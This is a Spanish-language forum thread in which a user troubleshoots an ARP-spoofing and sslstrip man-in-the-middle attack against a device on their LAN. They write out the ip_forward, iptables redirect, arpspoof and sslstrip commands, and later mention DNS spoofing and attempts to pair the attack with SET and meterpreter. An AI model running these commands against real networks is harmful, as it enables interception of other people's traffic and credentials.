Bueno en vista de que no he conseguido mi objetivo con el cain he decidido arrancar mi maquina con una live de backtrack y probar con las herramientas que nos brinda.

He seguido los siguientes pasos:
-Primera shell-
#echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
-segunda shell-
#arpspoof -i wlan0 -t 192.168.1.8 192.168.1.1
-tercera shell-
#python sslstrip.py -l 10000 -w trafico.log

bien ahora llega el problema.... cuando reviso el log del sslstrip veo que me saca algo tal que asi:

2012-12-29 16:54:06,485 Host resolution error: [Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.DNSLookupError'>: DNS lookup failed: address '192.168.1.1:80' not found: [Errno -5] No address associated with hostname.

Y cuando miro en la shell donde ejecute el sslstrip, me saca el siguiente texto...:

Mostrar/Ocultar

Teneis ide de de que es lo que esta fallando??
Que tal, primero que nada, te invito a utilizar los [ c o d e] para marcar tu código y el spoiler para que no se vea tan largo el post, ya que resulta un poco incomodo.
Ahora no se si tengas tu distro actualizada, si no es así ACTUALIZALA, segundo revisa tu versión de python que sea la misma con la que crearon sslstrip.py, y no se si la misma herramienta requiera algún otro componente revisa bien eso. Saludos!
1337 & culture!
Hola, gracias por contestar.
Ahora mismo no me deja editar el post ya, pero lo tendre en cuenta la proxima vez disculpa.
La distro esta actualizada, he reinstalado todo y debo citar que haciendole el mitm a otro equipo de la red me ha ido todo bien escepto el codigo ese que me suelta la shell del sslstrip pero si que hacia su trabajo.
sin embargo en el equipo anterior no consigo que funcione

Mostrar/Ocultar

No he hecho la copia completa por que es basicamente mas de lo miso.
No entiendo porque con un equipo funciona y con el otro no :S
Al parecer, si revisas el código que pegaste, te están detectando como malware y como phising.
No podría decir que que pasa internamente por que no se que es lo que estas intentado hacer.
Prueba con otra herramienta similar haber si obtienes otro tipo de resultado.
1337 & culture!
con otra herramienta a que te refieres exactamente?? no conozco ninguna otra herramienta que haga lo que hace sslstrip y sniffer como puedes ver no estaba utilizando ya que con tail -f log_de_sslstrip ya podia ir viendo el trafico que pasaba por el sslstrip
crees que se esta detectando el mitm con el arpspoof? en caso de ser asi se podria arreglar con el ettercap?
Se peude dar por cerrado el tema, en realidad creo que no son errores lo que soltaba la ventana del sslstrip si no que pasa lo mismo que cuando abres kwrite por ejemplo desde la terminal y luego interactuas con el, se van mostrando datos en la terminal que lo has lanzado, respecto al mitm he de decir que lo he logrado con exito, incluso un dnspoofing y algunas cosas mas, lo que no consigo es convinarlo con el set ya que cuando deberia abrir una sesion de meterpreter, el msf me muestra unas peticiones GET, pero bueno poco a poco, la verdad es que ha sido muy interesante toda esta practica, lo interesante seria poder hacerlo a traves de la wan... aunque creo que la unica manera sería haciendo de proxy de la victima y no sabria como sonseguirlo... de todos modos seguiré dandole al coco y preparando mas cafés, muchas gracias por tu ayuda KHC, siempre es un placer leerte.
Responder

Volver a “Seguridad Wireless”